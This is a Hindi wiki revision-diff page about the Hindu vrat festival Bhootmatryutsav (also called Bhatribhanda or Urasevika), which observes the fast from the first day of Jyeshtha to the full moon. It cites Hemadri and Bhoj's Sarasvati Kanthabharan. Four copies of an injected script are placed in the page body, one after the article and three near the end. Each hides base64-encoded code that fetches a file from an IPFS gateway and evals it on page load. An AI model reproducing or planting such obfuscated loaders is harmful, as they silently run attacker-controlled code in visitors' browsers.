Difference between revisions of "भूतमात्र्युत्सव"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replace - ")</ref" to "</ref")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
*[[ज्येष्ठ]] की [[प्रथमा]] से [[पूर्णिमा]] तक यह व्रत किया जाता है <ref>हेमाद्रि (व्रत0 2, 365-370)</ref>।  
+
*[[ज्येष्ठ]] की [[प्रथमा]] से [[पूर्णिमा]] तक यह व्रत किया जाता है <ref>हेमाद्रि (व्रत0 2, 365-370</ref>।  
 
*यह उदसेविका ही है।  
 
*यह उदसेविका ही है।  
 
*भोज कृत 'सरस्वती कण्ठाभरण' (एक काव्य शास्त्र) ने भी इसे क्रीडाओं के अंतर्गत परिगणित किया है।  
 
*भोज कृत 'सरस्वती कण्ठाभरण' (एक काव्य शास्त्र) ने भी इसे क्रीडाओं के अंतर्गत परिगणित किया है।  
*भातृभाण्डा, भूतमाता एवं उरसेविका एक ही उत्सव के तीन नाम हैं।<ref>हेमाद्रि (व्रत0 2, 367)</ref>
+
*भातृभाण्डा, भूतमाता एवं उरसेविका एक ही उत्सव के तीन नाम हैं।<ref>हेमाद्रि (व्रत0 2, 367</ref>
 
 
 
 
  

Latest revision as of 12:54, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • jyeshth ki prathama se poornima tak yah vrat kiya jata hai [1].
  • yah udasevika hi hai.
  • bhoj krit 'sarasvati kanthabharan' (ek kavy shastr) ne bhi ise kridaoan ke aantargat pariganit kiya hai.
  • bhatribhanda, bhootamata evan urasevika ek hi utsav ke tin nam haian.[2]

 


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vrat0 2, 365-370
  2. hemadri (vrat0 2, 367

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>